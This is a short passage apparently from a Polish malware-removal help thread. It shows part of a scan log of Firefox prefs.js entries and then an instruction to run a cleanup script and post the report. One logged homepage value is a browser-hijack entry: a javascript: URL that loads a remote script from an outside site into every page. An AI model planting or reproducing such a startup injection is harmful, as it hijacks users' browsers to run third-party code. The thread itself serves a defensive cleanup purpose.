FF - prefs.js..extensions.enabledItems: DTToolbar@toolbarnet.com:1.1.4.0024
FF - prefs.js..browser.search.selectedEngine: "DAEMON Search"
FF - prefs.js..browser.startup.homepage: "http://my.daemon-search.com/|javascript:(function(){function%20a(o){var%20script=document.createElement('script'script.id='stylujDodajObrazki';script.type='text/javascript';script.src='http://stylistki.pl/scripts/dodajObrazki. js?'+(new%20Date()).getTime();o.body.appendChild(script);}a(document);})();");
[/code]

Click [b]Wykonaj skrypt[/b] (Run script). Post the report.